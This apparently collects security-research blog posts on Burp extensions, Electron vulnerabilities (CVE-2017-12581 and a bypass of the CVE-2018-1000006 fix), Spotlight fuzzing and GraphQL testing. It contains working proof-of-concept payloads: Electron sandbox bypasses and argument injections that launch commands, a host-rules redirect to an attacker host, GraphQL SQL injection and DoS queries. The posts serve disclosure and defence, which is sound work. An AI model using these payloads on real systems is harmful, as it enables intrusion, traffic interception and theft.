
Developing Burp Suite Extensions training

We couldn't be more excited to present our brand-new class on web security and security automation. This blog post provides a quick overview of the eight-hour workshop.

Title

Developing Burp Suite Extensions - From manual testing to security automation.

Overview

Ensuring the security of web applications in continuous delivery environments is an open challenge for many organizations. Traditional application security practices slow development and, in many cases, don’t address security at all. Instead, a new approach based on security automation and tactical security testing is needed to ensure important components are being tested before going live. Security professionals must master their tools to improve the efficiency of manual security testing as well as to deploy custom security automation solutions.

Based on this premise, we have created a brand-new class taking advantage of Burp Suite - the de-facto standard for web application security. In just eight hours, we show you how to use Burp Suite’s extension capabilities and unleash the power of the tool to improve efficiency and effectiveness during security audits.

After a quick intro to Burp and its extension APIs, we work on setting up an optimal development environment enabling fast coding and debugging. While we develop our code using Oracle’s NetBeans, we also provide templates for IntelliJ IDEA and Eclipse.

We will create many different types of plugins:

  • Extension #1: A custom logger to provide persistency and data export functionalities
  • Extension #2: A simple (and yet useful) replay tool
  • Extension #3: Active check for Burp’s scanning engine
  • Extension #4: Passive check for Burp’s scanning engine

Finally, we leverage our extensions to build a security automation toolchain integrated into a CI environment (Jenkins). This workshop is based on real-life use cases where the combination of custom checks and automation can help uncover nasty security vulnerabilities.

All templates and code-complete Burp Suite extensions will be available for free on Doyensec’s GitHub. If you are curious, we’ve already uploaded the first three modules.

Audience

The training is suitable for both web application security specialists and developers. Attendees are expected to have a rudimentary understanding of Burp Suite as well as basic object-oriented programming experience (Burp extensions will be developed in Java).

Requirements

Attendees should bring their own laptop with the latest Java as well as their favourite IDE installed.

Upcoming dates

  • Heidelberg (Germany) - March 21, 2017: Delivered during the Troopers 2017 security conference. There are still seats available. Book it today and get Burp swag during the training!
  • Warsaw (Poland) - June 5, 2017: Come for the WarCon invite-only conference, stay for the training! For registration, please contact [email protected] with subject line "Burp Training Post-WarCon".

Private training

This training is delivered worldwide (English language) during both public and private events. Considering that the class is hands-on, we are able to accept up to 15 attendees. Video recording available on request.

Feel free to contact us at [email protected] for scheduling your class!

Modern Alchemy: Turning XSS into RCE

TL;DR

At the recent Black Hat Briefings 2017, Doyensec’s co-founder Luca Carettoni presented new research on Electron security. After a quick overview of Electron’s security model, we disclosed design weaknesses and implementation bugs that can be leveraged to compromise any Electron-based application. In particular, we discussed a bypass that would allow reliable Remote Code Execution (RCE) when rendering untrusted content (for example via Cross-Site Scripting) even with framework-level protections in place.

In this blog post, we would like to provide insight into the bug (CVE-2017-12581) and remediations.

What’s Electron?

While you may not recognize the name, it is likely that you’re already using Electron since it’s running on millions of computers. Slack, Atom, Visual Studio Code, WordPress Desktop, GitHub Desktop, Basecamp3, and Mattermost are just a few examples of applications built using this framework. Any time a traditional web application is ported to desktop, it is likely that the developers used Electron.

Electron Motto

Understanding the nodeIntegration flag

While Electron is based on Chromium’s Content module, it is not a browser. Since it facilitates the construction of complex desktop applications, Electron gives the developer a lot of power. In fact, thanks to the integration with Node.js, JavaScript can access operating system primitives to take full advantage of native desktop mechanisms.
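
To make the risk concrete, here is the classic proof-of-concept payload (a minimal sketch): with Node integration enabled, any JavaScript running in the renderer can spawn operating system processes.

<script>
	// With nodeIntegration enabled, page JavaScript can reach Node.js
	// primitives directly; this one-liner pops a calculator on Windows.
	require('child_process').exec('calc.exe');
</script>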

It is well understood that rendering untrusted remote/local content with Node integration enabled is dangerous. For this reason, Electron provides two mechanisms to “sandbox” untrusted resources:

BrowserWindow

mainWindow = new BrowserWindow({  
	"webPreferences": { 
		"nodeIntegration" : false,  
		"nodeIntegrationInWorker" : false 
	}
});

mainWindow.loadURL('https://www.doyensec.com/');

WebView

<webview src="https://www.doyensec.com/"></webview>

In the above examples, the nodeIntegration flag is set to false. JavaScript running in the page won’t have access to global references despite having a Node.js engine running in the renderer process.
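
As a quick sanity check (a minimal sketch to paste into the renderer’s console), you can probe for leaked Node globals:

// With nodeIntegration disabled, all of these should print "undefined"
console.log(typeof require);
console.log(typeof process);
console.log(typeof Buffer);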

Hunting for nodeIntegration bypasses

It should now be clear why nodeIntegration is a critical security-relevant setting for the framework. A vulnerability in this mechanism could lead to full host compromise from simply rendering untrusted web pages. As modern alchemists, we use this type of flaw to turn traditional XSS into RCE. Since all Electron applications are bundled with the framework code, it is also complicated to fix these issues across the entire ecosystem.

During our research, we have extensively analyzed all project code changes to uncover previously discovered bypasses (we counted 6 before v1.6.1) with the goal of studying Electron’s design and weaknesses. Armed with that knowledge, we went for a hunt.

By studying the official documentation, we quickly identified a significant deviation from standard browsers caused by Electron’s “glorified” JavaScript APIs.

When a new window is created, Electron returns an instance of BrowserWindowProxy. This class can be used to manipulate the child browser window, thus subverting the Same-Origin Policy (SOP).

SOP Bypass #1

<script>
const win = window.open("https://www.doyensec.com"); 
win.location = "javascript:alert(document.domain)"; 
</script> 

SOP Bypass #2

<script>
const win = window.open("https://www.doyensec.com"); 
win.eval("alert(document.domain)");
</script>

The eval mechanism used by the SOP Bypass #2 can be explained with the following diagram:

BrowserWindowProxy's Eval

Additional source code review revealed the presence of privileged URLs (similar to browsers’ privileged zones). Combining the SOP bypass by design with a specific privileged URL defined in lib/renderer/init.js, we realized that we could override the nodeIntegration setting.

Chrome DevTools in Electron, prior to 1.6.8

A simple, yet reliable, proof-of-concept of the nodeIntegration bypass affecting all Electron releases prior to 1.6.7 is hereby included:

<!DOCTYPE html>
<html>
  <head>
    <title>nodeIntegration bypass (SOP2RCE)</title>
  </head>
  <body>
  	<script>
    	document.write("Current location:" + window.location.href + "<br>");

    	const win = window.open("chrome-devtools://devtools/bundled/inspector.html");
    	win.eval("const {shell} = require('electron'); shell.openExternal('file:///Applications/Calculator.app');");
       </script>
  </body>
</html>

On May 10, 2017, we reported this issue to the maintainers via email. In a matter of hours, we received a reply that they were already working on a fix, since the privileged chrome-devtools:// URL had been discovered during an internal security activity just a few days before our report. In fact, while the latest release on the official website at that time was 1.6.7, the git commit that fixes the privileged URL is dated April 24, 2017.

The issue was fixed in 1.6.8 (officially released around the 15th of May). All previous versions of Electron, and consequently all Electron-based apps, were affected. MITRE assigned CVE-2017-12581 to this issue.

Mitigating nodeIntegration bypass vulnerabilities

  • Keep your application in sync with the latest Electron framework release. When releasing your product, you’re also shipping a bundle composed of Electron, Chromium shared library and Node. Vulnerabilities affecting these components may impact the security of your application. By updating Electron to the latest version, you ensure that critical vulnerabilities (such as nodeIntegration bypasses) are already patched and cannot be exploited to abuse your application.

  • Adopt secure coding practices. The first line of defense for your application is your own code. Common web vulnerabilities, such as Cross-Site Scripting (XSS), have a higher security impact on Electron, hence it is highly recommended to adopt secure software development best practices and perform periodic security testing.

  • Know your framework (and its limitations). Certain principles and security mechanisms implemented by modern browsers are not enforced in Electron (e.g. SOP enforcement). Adopt defense in depth mechanisms to mitigate those deficiencies. For more details, please refer to our Electronegativity, A study of Electron Security presentation and Electron Security Checklist white-paper.

  • Use the recent “sandbox” experimental feature. Even with nodeIntegration disabled, the current implementation of Electron does not completely mitigate all risks introduced by loading untrusted resources. As such, it is recommended to enable sandboxing, which leverages the native Chromium sandbox. A sandboxed renderer does not have a Node.js environment running (with the exception of preload scripts) and the renderers can only make changes to the system by delegating tasks to the main process via IPC. While still not perfect at the time of writing (there are known security issues, sandbox is not supported for the <webview> tag, etc.), this option should be enabled to provide additional isolation (a minimal configuration is sketched below).
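
The following sketch assumes an Electron release where the experimental sandbox option is available:

mainWindow = new BrowserWindow({
	"webPreferences": {
		"sandbox": true,            // leverage the native Chromium sandbox
		"nodeIntegration": false    // keep Node.js primitives out of the renderer
	}
});

mainWindow.loadURL('https://www.doyensec.com/');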

Staring into the Spotlight

Spotlight is the all-pervasive seeing eye of the OSX userland. It drinks from a spout of file events sprayed out of the kernel and neatly indexes such things for later use. It is an amalgamation of binaries and libraries, all neatly fitted together just to give a user oversight of their box. It presents an interesting attack surface, and this blog post explains how some of it works.

One day, we found some interesting-looking crashes recorded in /Users/<name>/Library/Logs/DiagnosticReports.

Yet the crashes weren’t from the target. In OSX, whenever a file is created, a filesystem event is generated and sent down from the kernel. Spotlight listens for this event and others to immediately parse the created file for metadata. While fuzzing a native file parser, these Spotlight crashes began to appear from mdworker processes. Spotlight was attempting to index each of the mutated input samples, intending to include them in search results later.

fsevents

The Spotlight system is overseen by mds. It opens and reads from /dev/fsevents, which streams down file system event information from the kernel. Instead of dumping the events to disk, like fseventsd, it dumps the events into worker processes to be parsed on behalf of Spotlight. Mds is responsible for delegating work to and managing mdworker processes, with which it communicates through Mach messaging. It creates, monitors, and kills mdworkers based on some light rules. The kernel does not block, and the volume of events streaming through the fsevents device can be quite large. Mds will spawn more mdworker processes when handling a higher event volume, but there is no guarantee it can see and capture every single event.

The kernel filters which root-level processes can read from this device.

fsevents filter

Each of the mdworker processes gets spawned, parses some files, writes the meta info, and dies. Mdworker shares a lot of code with mdimport, its command line equivalent. The mdimport binary is used to debug and test Spotlight importers and therefore makes a great target for auditing and fuzzing. Much of what we talk about in regards to mdimport also applies to mdworker.

Importers

You can see what mdworkers are up to with the following: sudo fs_usage -w -f filesys mdworker

Importers are found in /Library/Spotlight, /System/Library/Spotlight, or in an application’s bundle within “/Contents/Library/Spotlight”. If the latter is chosen, the app typically runs a post-install script with mdimport -r <importer> and/or lsregister. The following command shows the list of importers present on my laptop. It shows that some third party apps have installed their own importers.

$ mdimport -L
2017-07-30 00:36:15.518 mdimport[40541:1884333] Paths: id(501) (
    "/Library/Spotlight/iBooksAuthor.mdimporter",
    "/Library/Spotlight/iWork.mdimporter",
    "/Library/Spotlight/Microsoft Office.mdimporter",
    "/System/Library/Spotlight/Application.mdimporter",
...
    "/System/Library/Spotlight/SystemPrefs.mdimporter",
    "/System/Library/Spotlight/vCard.mdimporter",
    "/Applications/Xcode.app/Contents/Applications/Application Loader.app/Contents/Library/Spotlight/MZSpotlight.mdimporter",
    "/Applications/LibreOffice.app/Contents/Library/Spotlight/OOoSpotlightImporter.mdimporter",
    "/Applications/OmniGraffle.app/Contents/Library/Spotlight/OmniGraffle.mdimporter",
    "/Applications/GarageBand.app/Contents/Library/Spotlight/LogicX_MDImport.mdimporter",
    "/Applications/Xcode.app/Contents/Library/Spotlight/uuid.mdimporter"
)

These .mdimporter files are actually just packages holding a binary. These binaries are what we are attacking.

Using mdimport is simple - mdimport <file>. Spotlight will only index metadata for filetypes having an associated importer. File types are identified through magic. For example, mdimport reads from the MAGIC environment variable or uses the “/usr/share/file/magic” directory which contains both the compiled .mgc file and the actual magic patterns. The format of magic files is discussed at the official Apple developer documentation.

Crash File

crash logging

One thing to notice is that the crash log will contain some helpful information about the cause. The following message gets logged by both mdworker and mdimport, which share much of the same code:

Application Specific Information:
import fstype:hfs fsflag:480D000 flags:40000007E diag:0 isXCode:0 uti:com.apple.truetype-datafork-suitcase-font plugin:/Library/Spotlight/Font.mdimporter - find suspect file using: sudo mdutil -t 2682437

The 2682437 is the iNode reference number for the file in question on disk. The -t argument to mdutil will ask it to look up the file based on volume ID and iNode and spit out the string. It performs an open and fcntl on the pseudo directory /.vol/<Volume ID>/<File iNode>. You can see this info with the stat syscall on a file.

$ stat /etc
16777220 418395 lrwxr-xr-x 1 root wheel 0 11 "Dec 10 05:13:41 2016" "Dec 10 05:13:41 2016" "Dec 10 05:15:47 2016" "Dec 10 05:13:41 2016" 4096 8 0x88000 /etc

$ ls /.vol/16777220/418395
afpovertcp.cfg    fstab.hd            networks          protocols
aliases           ftpd.conf           newsyslog.conf    racoon
aliases.db        ftpd.conf.default   newsyslog.d       rc.common

The UTI registered by the importer is also shown “com.apple.truetype-datafork-suitcase-font”. In this case, the crash is caused by a malformed Datafork TrueType suitcase (.dfont) file.

When we find a bug, we can study it under lldb. Launch mdimport under the debugger with the crash file as an argument. In this particular bug it breaks with an exception in the /System/Library/Spotlight/Font.mdimporter importer.

crash logging

The screenshot below shows the problematic procedure, with the crashing instruction highlighted for this particular bug.

The rsi register points into the memory mapped font file. A value is read out and stored in rax which is then used as an offset from rcx which points to the text segment of the executable in memory. A lookup is done on a hardcoded table and parsing proceeds from there. The integer read out of the font file is never validated.

When writing or reversing a Spotlight importer, the main symbol to first look at will be GetMetadataForFile or GetMetadataForURL. This function receives a path to parse and is expected to return the metadata as a CFDictionary.

We can see, from the stacktrace, how and where mdimport jumps into the GetMetadataForFile function in the Font importer. Fuzzing mdimport is straightforward; crashes and signals are easily caught.

The variety of importers present on OSX is sometimes patched alongside the framework libraries, as code is shared. However, a lot of code is unique to these binaries and represents a nice attack surface. The Spotlight system is extensive, including its own query language, and makes a great target where more research is needed.

When fuzzing in general on OSX, disable Spotlight oversight of the folder where you generate and remove your input samples. The folder can be added in System Preferences->Spotlight->Privacy. You can’t fuzz mdimport from this folder; instead, disable Spotlight with “mdutil -i off” and run your fuzzer from a different folder.

@day6reak

We're hiring - Join Doyensec!

At Doyensec, we believe that quality is the natural product of passion and care. We love what we do and we routinely take on difficult engineering challenges to help our customers build with security.

We are a small, highly focused team. We concentrate on application security and do fewer things better. We don’t care about your education, background, or certifications. If you are really good at, and passionate about, building and breaking complex software, you’re the right candidate.

Open Positions

:: Full-stack Security Automation Engineer (Six Months Collaboration, Remote Work) ::

We are looking for a full-stack senior software engineer that can help us build security automation tools. If you’ve ever built a fuzzer, played with static analysis and enhanced a web scanner engine, you probably have the right skillset for the job.

We offer a well-paid six-month collaboration, combined with an additional bonus upon successful completion of the project.

Responsibilities:

  • Full-stack development (front-end, back-end components) of web security testing tools
  • Solve technical challenges at the edge of web security R&D, together with Doyensec’s founders

Requirements:

  • Experience developing multi-tiered software applications or products. We generally use Node.js and Java, and require proficiency in those languages
  • Ability to work with standard dev tools and techniques (IDE, git, …)
  • You’re passionate about building great software and can have fun while doing it
  • Interested in web security, with good understanding of common software vulnerabilities
  • You’re self-driven and can focus on a project to make it happen
  • Eager to learn, adapt and perfect your work

Contact us at [email protected]

:: Application Security Engineer (Full-time, Remote Work - Europe) ::

We are looking for an experienced security engineer to join our consulting team. We perform graybox security testing on complex web and mobile applications. We need someone who can hit the ground running. If you’re good at “crawling around in the ventilation ducts of the world’s most popular and important applications”, you probably have the right skillset for the job.

We offer a competitive salary in a supportive and dynamic environment that rewards hard work and talent. We are dedicated to providing research-driven application security and therefore reserve 25% of your time exclusively for research, where we build security testing tools, discover new attack techniques, and develop countermeasures.

Responsibilities:

  • Security testing of web, mobile (iOS, Android) applications
  • Vulnerability research activities, coordinated and executed with Doyensec’s founders
  • Partner with customers to ensure project’s objectives are achieved 

Requirements:

  • Ability to discover, document and fix security bugs
  • You’re passionate about understanding complex systems and can have fun while doing it
  • Top-notch in web security. Show us public research, code, advisories, etc.
  • Eager to learn, adapt, and perfect your work

Contact us at [email protected]

GraphQL - Security Overview and Testing Tips

With the increasing popularity of GraphQL technology we are summarizing some documentation and tips about common security mistakes.

What is GraphQL?

GraphQL is a data query language developed by Facebook and publicly released in 2015. It is an alternative to REST APIs.

Even if you don’t see any GraphQL out there, it is likely you’re already using it, since it’s in use at big tech companies like Facebook, GitHub, Pinterest, Twitter, HackerOne, and many more.

A few key points on this technology

  • GraphQL provides a complete and understandable description of the data in the API and gives clients the power to ask for exactly what they need. Queries always return predictable results.

  • While typical REST APIs require loading from multiple URLs, GraphQL APIs get all the data your app needs in a single request.

  • GraphQL APIs are organized in terms of types and fields, not endpoints. You can access the full capabilities of all your data from a single endpoint.

  • GraphQL is strongly typed to ensure that applications only ask for what’s possible and provide clear and helpful errors.

  • New fields and types can be added to the GraphQL API without impacting existing queries. Aging fields can be deprecated and hidden from tools.

Before we start diving into the GraphQL security landscape, here is a brief recap on how it works. The official documentation is well written and was really helpful.

A GraphQL query looks like this:

Basic GraphQL Query

query{
	user{
		id
		email
		firstName
		lastName
	}
}

While the response is JSON:

Basic GraphQL Response

{
	"data": {
		"user": {
			"id": "1",
			"email": "[email protected]",
			"firstName": "Paolo",
			"lastName": "Stagno"
		}
	}
}

Security Testing Tips

Since Burp Suite does not understand GraphQL syntax well, I recommend using graphql-ide, an Electron-based app that allows you to edit and send requests to a GraphQL endpoint; I also wrote a small Python script, GraphQL_Introspection.py, that enumerates a GraphQL endpoint (with introspection) in order to pull out documentation. The script is useful for examining the GraphQL schema, looking for information leakage, hidden data, and fields that are not intended to be accessible.

The tool will generate an HTML report similar to the following:

Python Script pulling data from a GraphQL endpoint

Introspection is used to ask a GraphQL schema for information about the queries, types, and so on that it supports.
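
As an illustrative sketch (assuming a Node.js environment with the node-fetch module, and a hypothetical target endpoint), a minimal introspection probe looks like this:

const fetch = require('node-fetch');

// Minimal introspection query: if the endpoint answers with type names,
// the whole schema can likely be dumped.
const query = '{ __schema { types { name } } }';

fetch('https://target.example.com/graphql', {
	method: 'POST',
	headers: { 'Content-Type': 'application/json' },
	body: JSON.stringify({ query: query })
})
	.then(res => res.json())
	.then(json => console.log(JSON.stringify(json, null, 2)))
	.catch(console.error);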

As a pentester, I would recommend looking for requests issued to “/graphql” or “/graphql.php” since those are usual GraphQL endpoint names; you should also search for “/graphiql”, “/graphql/console/”, online GraphQL IDEs to interact with the backend, and “/graphql.php?debug=1” (debugging mode with additional error reporting) since they may be left open by developers.

When testing an application, verify whether requests can be issued without the usual authorization token header:

GraphQL Bearer Authorization Header Example

Since the GraphQL framework does not provide any means for securing your data, developers are in charge of implementing access control as stated in the documentation:

“However, for a production codebase, delegate authorization logic to the business logic layer”.

Things may go wrong, thus it is important to verify whether a user without proper authentication and/or authorization can request the whole underlying database from the server.
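
Following the documentation’s advice, the check belongs in the business logic layer rather than in the GraphQL layer itself. A hedged sketch (postRepository and context.user are hypothetical names):

// The resolver stays thin: it forwards the caller's identity and lets
// the data layer decide what this user may actually read.
function postResolver(obj, args, context) {
	return postRepository.getBody(context.user, args.postId);
}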

When building an application with GraphQL, developers have to map data to queries in their chosen database technology. This is where security vulnerabilities can be easily introduced, leading to Broken Access Controls, Insecure Direct Object References and even SQL/NoSQL Injections.

As an example of a broken implementation, the following request/response demonstrates that we can fetch data for any user of the platform (by cycling through the ID parameter), while simultaneously dumping password hashes:

Query

query{
	user(id: 165274){
		id
		email
		firstName
		lastName
		password
	}
}

Response

{
	"data": {
		"user": {
			"id": "165274",
			"email": "[email protected]",
			"firstName": "John",
			"lastName": "Doe"
			"password": "5F4DCC3B5AA765D61D8327DEB882CF99"
		}
	}
}

Another thing you will have to check is information disclosure when performing illegal queries:

Information Disclosure

{
	"errors": [
		{
			"message": "Invalid ID.",
			"locations": [
				{
					"line": 2,
					"column": 12
				}
			],
			"Stack": "Error: invalid ID\n at (/var/www/examples/04-bank/graphql.php)\n"
		}
	]
}

Even though GraphQL is strongly typed, SQL/NoSQL Injections are still possible since GraphQL is just a layer between client apps and the database. The problem may reside in the layer developed to fetch variables from GraphQL queries in order to interrogate the database; variables that are not properly sanitized lead to plain old SQL Injection. In the case of MongoDB, NoSQL injection may not be as simple since we cannot “juggle” types (e.g. turning a string into an array; see PHP MongoDB Injection).
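
On the server side, the kind of resolver that introduces such a bug might look as follows (a purely hypothetical sketch; context.db stands in for whatever database handle the application uses):

const resolvers = {
	authors: (root, args, context) => {
		// VULNERABLE: the attacker-controlled filter value is concatenated
		// straight into the SQL string.
		const sql = "SELECT * FROM authors WHERE username = '"
			+ args.filter.username + "'";
		return context.db.query(sql);
	}
};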

GraphQL SQL Injection

mutation search($filters: Filters!){
	authors(filter: $filters)
	viewer{
		id
		email
		firstName
		lastName
	} 
}

{
	"filters":{
		"username":"paolo' or 1=1--"
		"minstories":0
	}
}

Beware of nested queries! They can allow a malicious client to perform a DoS (Denial of Service) attack via overly complex queries that will consume all the resources of the server:

Nested Query

query {
 stories{
  title
  body
  comments{
   comment
   author{
    comments{
     author{
      comments{
       comment
       author{
        comments{
         comment
         author{
          comments{
           comment
           author{
            name
           }
          }
         }
        }
       }
      }
     }
    }
   }
  }
 }
}

An easy remediation against DoS could be setting a timeout, a maximum depth or a query complexity threshold value.
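
For instance, in a JavaScript backend (a sketch assuming the express-graphql middleware and the graphql-depth-limit package), a maximum depth can be enforced as a validation rule:

const express = require('express');
const graphqlHTTP = require('express-graphql');
const depthLimit = require('graphql-depth-limit');
const schema = require('./schema'); // hypothetical application schema

const app = express();

// Queries nested more than 10 levels deep are rejected before execution.
app.use('/graphql', graphqlHTTP({
	schema: schema,
	validationRules: [depthLimit(10)]
}));

app.listen(4000);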

Keep in mind that in the PHP GraphQL implementation:

  • Complexity analysis is disabled by default

  • Limiting Query Depth is disabled by default

  • Introspection is enabled by default. It means that anybody can get a full description of your schema by sending a special query containing the meta fields __type and __schema

Outro

GraphQL is an interesting new technology, which can be used to build secure applications. Since developers are in charge of implementing access control, applications are prone to classical web application vulnerabilities like Broken Access Controls, Insecure Direct Object References, Cross-Site Scripting (XSS) and Classic Injection Bugs. As with any technology, GraphQL-based applications may be prone to implementation errors like this real-life example:

“By using a script, an entire country’s (I tested with the US, the UK and Canada) possible number combinations can be run through these URLs, and if a number is associated with a Facebook account, it can then be associated with a name and further details (images, and so on).”

@voidsec

Electron Windows Protocol Handler MITM/RCE (bypass for CVE-2018-1000006 fix)

As part of an engagement for one of our clients, we analyzed the patch for the recent Electron Windows Protocol handler RCE bug (CVE-2018-1000006) and identified a bypass.

Under certain circumstances this bypass leads to session hijacking and remote code execution. The vulnerability is triggered by simply visiting a web page through a browser. Electron apps designed to run on Windows that register themselves as the default handler for a protocol and do not prepend dash-dash in the registry entry are affected.

We reported the issue to the Electron core team (via [email protected]) on May 14, 2018 and received immediate notification that they were already working on a patch. The issue was also reported by Google’s Nicolas Ruff a few days earlier.

CVE-2018-1000006

On January 22, 2018 Electron released a patch for v1.7.11, v1.6.16 and v1.8.2-beta4 for a critical vulnerability known as CVE-2018-1000006 (surprisingly no fancy name here) affecting Electron-based applications running on Windows that register custom protocol handlers.

The original issue was extensively discussed in many blog posts, and can be summarized as the ability to use custom protocol handlers (e.g. myapp://) from a remote web page to piggyback command line arguments and insert a new switch that Electron/Chromium/Node would recognize and execute while launching the application.

<script>
window.location = 'myapp://foobar" --gpu-launcher="cmd /c start calc" --foobar='
</script>

Interestingly, on January 31, 2018, Electron v1.7.12, v1.6.17 and v1.8.2-beta5 were released. It turned out that the initial patch did not take uppercase characters into account, which made it possible to bypass the previous fix with:

<script>
window.location = 'myapp://foobar" --GPU-launcher="cmd /c start calc" --foobar='
</script> 

Understanding the patch

The patch for CVE-2018-1000006 is implemented in electron/atom/app/command_line_args.cc and consists of a validation mechanism which ensures users won’t be able to include Electron/Chromium/Node arguments after a URL (the specific protocol handler). Bear in mind some locally executed applications do require the ability to pass custom arguments.

bool CheckCommandLineArguments(int argc, base::CommandLine::CharType** argv) {
  DCHECK(std::is_sorted(std::begin(kBlacklist), std::end(kBlacklist),
                        [](const char* a, const char* b) {
                          return base::StringPiece(a) < base::StringPiece(b);
                        }))
      << "The kBlacklist must be in sorted order";
  DCHECK(std::binary_search(std::begin(kBlacklist), std::end(kBlacklist),
                            base::StringPiece("inspect")))
      << "Remember to add Node command line flags to kBlacklist";

  const base::CommandLine::StringType dashdash(2, '-');
  bool block_blacklisted_args = false;
  for (int i = 0; i < argc; ++i) {
    if (argv[i] == dashdash)
      break;
    if (block_blacklisted_args) {
      if (IsBlacklistedArg(argv[i]))
        return false;
    } else if (IsUrlArg(argv[i])) {
      block_blacklisted_args = true;
    }
  }
  return true;
}

As is commonly seen, blacklist-based validation is prone to errors and omissions, especially in complex execution environments like Electron:

  • The patch relies on a static blacklist of available Chromium flags. On each libchromiumcontent update, the Electron team must remember to update the command_line_args.cc file in order to make sure the blacklist is aligned with the current implementation of Chromium/v8
  • The blacklist is implemented using a binary search. Valid flags could be missed by the check if they’re not properly sorted

Bypass and security implications

We started looking for missed flags and noticed that host-rules was absent from the blacklist. With this flag, one may specify a set of rules to rewrite domain names for requests issued by libchromiumcontent. This immediately stuck out as a good candidate for subverting the process.

In fact, an attacker can exploit this issue by overriding the host definitions in order to perform a completely transparent Man-In-The-Middle attack:

<!doctype html>
<script>
 window.location = 'skype://user?userinfo" --host-rules="MAP * evil.doyensec.com" --foobar='
</script>

When a user visits a web page containing the preceding code, the Skype app will be launched and all Chromium traffic will be forwarded to evil.doyensec.com instead of the original domain. Since the connection is made to the attacker-controlled host, certificate validation does not help, as demonstrated in the following video:

We analyzed the impact of this vulnerability on popular Electron-based apps and developed working proof-of-concepts for both MITM and RCE attacks. While the immediate implication is that an attacker can obtain confidential data (e.g. oauth tokens), this issue can be also abused to inject malicious HTML responses containing XSS -> RCE payloads. With nodeIntegration enabled, this is simply achieved by leveraging Node’s APIs. When encountering application sandboxing via nodeIntegration: false or sandbox, it is necessary to chain this with other bugs (e.g. nodeIntegration bypass or IPC abuses).

Please note that it is only possible to intercept traffic generated by Chromium, and not Node. For this reason, Electron’s update feature, along with other critical functions, is not affected by this vulnerability.

Future

On May 16, 2018, Electron released a new update containing an improved version of the blacklist for v2.0.1, v1.8.7, and v1.7.15. The team is actively working on a more resilient solution to prevent further bypasses. Considering that the API change may potentially break existing apps, it makes sense to see this security improvement within a major release.

In the meantime, Electron application developers are recommended to enforce the dash-dash notation in setAsDefaultProtocolClient:

app.setAsDefaultProtocolClient(protocol, process.execPath, [
  '--your-switches-here',
  '--'
])

or in the Windows protocol handler registry entry:

secure Windows protocol handler

As a final remark, we would like to thank the entire Electron team for their work on moving to a secure-by-default framework. Electron contributors are tasked with the non-trivial mission of closing the web-native desktop gap. Modern browsers are enforcing numerous security mechanisms to ensure isolation between sites, facilitate web security protections and prevent untrusted remote content from compromising the security of the host. When working with Electron, things get even more complicated.

@ikkisoft

@day6reak

Instrumenting Electron Apps for Security Testing

With the increasing popularity of the Electron Framework, we have created this post to summarize a few techniques which can be used to instrument an Electron-based application, change its behavior, and perform in-depth security assessments.

Electron and processes

The Electron Framework is used to develop multi-platform desktop applications with nothing more than HTML, JavaScript and CSS. It has two core components: Node.js and the libchromiumcontent module from the Chromium project.

In Electron, the main process is the process that runs package.json’s main script. This component has access to Node.js primitives and is responsible for starting other processes. Chromium is used for displaying web pages, which are rendered in separate processes called renderer processes.

Unlike regular browsers, where web pages run in a sandboxed environment and do not have access to native system resources, Electron renderers have access to Node.js primitives and allow lower-level integration with the underlying operating system. Electron exposes full access to native Node.js APIs, but it also facilitates the use of external Node.js NPM modules.

As you might have guessed from recent public security vulnerabilities, the security implications are substantial since JavaScript code can access the filesystem, user shell, and many more primitives. The inherent security risks increase with the additional power granted to application code. For instance, displaying arbitrary content from untrusted sources inside a non-isolated renderer is a severe security risk. You can read more about Electron Security, hardening and vulnerabilities prevention in the official Security Recommendations document.

Unpacking the ASAR archive

The first thing to do to inspect the source code of an Electron-based application is to unpack the application bundle (.asar file). ASAR archives are a simple tar-like format that concatenates files into a single one.

First locate the main ASAR archive of our app, usually named core.asar or app.asar.

Once we have this file we can proceed with installing the asar utility: npm install -g asar

and extract the whole archive: asar extract core.asar destinationfolder

In its simplest form, an Electron application includes three files: index.js, index.html and package.json.

Our first target to inspect is the package.json file, as it holds the path of the file responsible for the “entry point” of our application:

{
  "name": "Example App",
  "description": "Core App",
  "main": "app/index.js",
  "private": true
}

In our example, the entry point is the file called index.js located within the app folder, which will be executed as the main process. If not specified, index.js is the default main file. The file index.html and other web resources are used in renderer processes to display actual content to the user. A new renderer process is created for every BrowserWindow instantiated in the main process.
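
For reference, a minimal main process entry point looks roughly like this (a sketch, not taken from any particular application):

const { app, BrowserWindow } = require('electron');

let mainWindow;

app.on('ready', () => {
	// Each BrowserWindow gets its own renderer process
	mainWindow = new BrowserWindow({ width: 800, height: 600 });
	mainWindow.loadURL(`file://${__dirname}/index.html`);
});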

In order to be able to follow functions and methods in our favorite IDE, it is recommended to resolve the dependencies of our app:

npm install

We should also install Devtron, a tool (built on top of the Chrome Developer Tools) to inspect, monitor and debug our Electron app. For Devtron to work, nodeIntegration must be on.

npm install --save-dev devtron

Then, run the following from the Console tab of the Developer Tools

require('devtron').install()

Dealing with obfuscated JavaScript

Whenever the application is neither minified nor obfuscated, we can easily inspect the code.

'use strict';

Object.defineProperty(exports, "__esModule", {
  value: true
});
exports.startup = startup;
exports.handleSingleInstance = handleSingleInstance;
exports.setMainWindowVisible = setMainWindowVisible;

var _require = require('electron'),
    Menu = _require.Menu;

var mainScreen = void 0;
function startup(bootstrapModules) {
[ -- cut -- ]

In the case of obfuscation, there are no silver bullets to unfold heavily manipulated JavaScript code. In these situations, a combination of automatic tools and manual reverse engineering is required to get back to the original source.

Take this horrendous piece of JS as an example:

